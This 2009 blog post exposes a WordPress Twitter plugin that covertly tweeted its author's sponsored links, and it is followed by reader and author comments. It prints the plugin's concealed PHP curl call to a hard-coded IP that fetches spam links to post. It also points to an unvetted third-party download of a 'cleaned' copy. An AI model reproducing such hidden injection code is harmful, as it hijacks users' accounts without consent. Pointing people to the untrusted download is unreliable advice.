Automatic Twitter Poster Plugin for WordPress is a SCAM

I’m a pretty new face to twitter (you can find me here). Yet, to manually post twitter updates on twitter was a drag, so I wanted to download a plugin for WordPress that automatically autopost updates whenever I updated/created a post. I found this plugin called Twitter-poster from http://wordpress.org/extend/plugins. At first, I was mesmerized that I didn’t have to spend a couple extra seconds updating my own twitter updates (saved me a whole 30 seconds of my day, yes its alot!)

It posted nice little message such as this:

Looks pretty doesn’t it? Well, there is an ugly truth to this. What you may ask? Well, the author coded himself a black hat plugin which processes his own private messages on your twitter wall. Here are some of them:

Cool news feed for parents|http://www.baby-parenting.co.uk/
Checking out my own name in the new baby names search|http://www.abc-baby-names.com/
This is a new weight loss network on ning|http://sensaweightloss.ning.com/
Think you might be pregnant. This is what you need|http://www.baby-parenting.com/trying/amipregnant.html
Pregnancy calendar network, check it out|http://pregnancycalendar.ning.com/

Follow my lead? The seem to be  all related to Parenting or weightloss. A valid topic for a money making scheme and using other twitter customers behind it!

If you follow the authors WordPress bio, you will find that his website is: http://www.baby-parenting.com, coincidence? I think not!

I had to check the source code out for myself, it was all very well written, the author did use something tactics to hide some of his refer. I came across to this part:

if ($posts_so_far >= $intervalPosts)
{
$posts_so_far = 0;
$curl_handle = curl_init();
$encoded_link = urlencode($link);
$referrer = $link;
curl_setopt($curl_handle, CURLOPT_URL, “http://72.9.228.239/get_link_info.php?source=$encoded_link”);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl_handle, CURLOPT_REFERER, $referrer);
$data = curl_exec($curl_handle);
$http_status = curl_getinfo($curl_handle, CURLINFO_HTTP_CODE);
curl_close($curl_handle);
$data = trim($data);
list($num_posts, $sponsor, $msg, $url) = split(“\|”, $data);
if ($intervalPosts != $num_posts) { update_option( ‘intervalPosts’, $num_posts );

I was curious what the http://72.9.228.239/get_link_info.php?source=$encoded_link link was for, and I processed to find out. Well, what it turns out is that it encoded the links mentioned above and posts them after a couple of your own posts. $posts_so_far (your posts) is calculated and than if it is greater than $intervalPosts it will post a link from http://72.9.228.239.

A very sneaky way to find post black hat twitter messages. A very original idea. If you want to remove the black hat posts, just:

Take out the http://72.9.228.239/get_link_info.php?source=$encoded_link from curl_setopt($curl_handle, CURLOPT_URL,

So it will look like this:

curl_setopt($curl_handle, CURLOPT_URL, “”);

Or you can download my free-of-black-hat version right here (I swear by it ).

http://asapload.com/211217

**UPDATE**

After I posted this article, the author changed his plugin page and posted this:

A sponsor link will be included in every 5th post/tweet to help the future development of this plugin and other useful plugins

**UPDATE 2**

The twitter plugin now has an optional setting to change if you want to support the author’s spam or not:

** An optional sponsor link will be included in every 5th post/tweet. This sponsored tweet/link can be disabled on the settings page by un-checking the “Allow Sponsor Tweet” checkbox

51 Responsesto “Automatic Twitter Poster Plugin for WordPress is a SCAM”

1. Twitter Poster says:

   March 13, 2009 at 8:32 am

   The description was actually updated 5 days before you wrote this blog, it is clear from the description and the settings page what the plugin does.
2. domz says:

   March 13, 2009 at 12:18 pm

   I am not going to dispute with you when you updated that the plugin was spam. Nevertheless, it was after I installed it and started to use it. You should have stated it at the begging when you submitted it to wordpress. Here are some other people that are furious with the spam.
   http://wordpress.org/support/topic/251692
   http://wordpress.org/support/topic/251812
3. Twitter Poster says:

   March 14, 2009 at 2:06 pm

   Yes, it was a mistake, the original README had many errors and was corrected within 2 days of the plugin being uploaded, without any comment from anyone. My intention was not to mislead anyone, those interested in the functionality of the plugin could use it, those who were not could leave it.
   The other 2 comments were posted days after the correct README was uploaded
4. Twitter Poster says:

   March 18, 2009 at 7:51 am

   Sponsored link is now optional in version 2.0.7
5. Monsefe says:

   March 28, 2009 at 5:49 pm

   Thank you really good job, i have just decoding the base_64 and finding your post so you have alery done whit the job

   Thank
6. FlyGurl says:

   May 9, 2009 at 8:17 am

   The check box does not work. I unchecked the box and still my post were spammed as well as my twitter account causing me to lose alot of followers on twitter as they were pissed about the spam!
7. Wagner Reis says:

   June 9, 2009 at 11:13 am

   I remove this bad plugin and they STILL MADE SPAN IN MY POST!

   I insert the text in the post text, i have to edit more than 10 posts to remove this SPAN PLUGIN!

   BAN THIS PLUGIN AND THIS USER!
8. James Stein says:

   June 11, 2009 at 5:08 pm

   Ha Ha! Great post and way to go to force the author of such plugin to act the way he should. He should have had the option there to begin with and if he wanted money for the plugin then he should have sold it from day one and not list it on wordpress

   James
9. andy says:

   August 4, 2009 at 3:40 pm

   Wonderful!Your artivcle is great.Thanks for your useful info. You can visit my UGG.supra shoes.Muks boots.Waiting for your coming!Thanks!!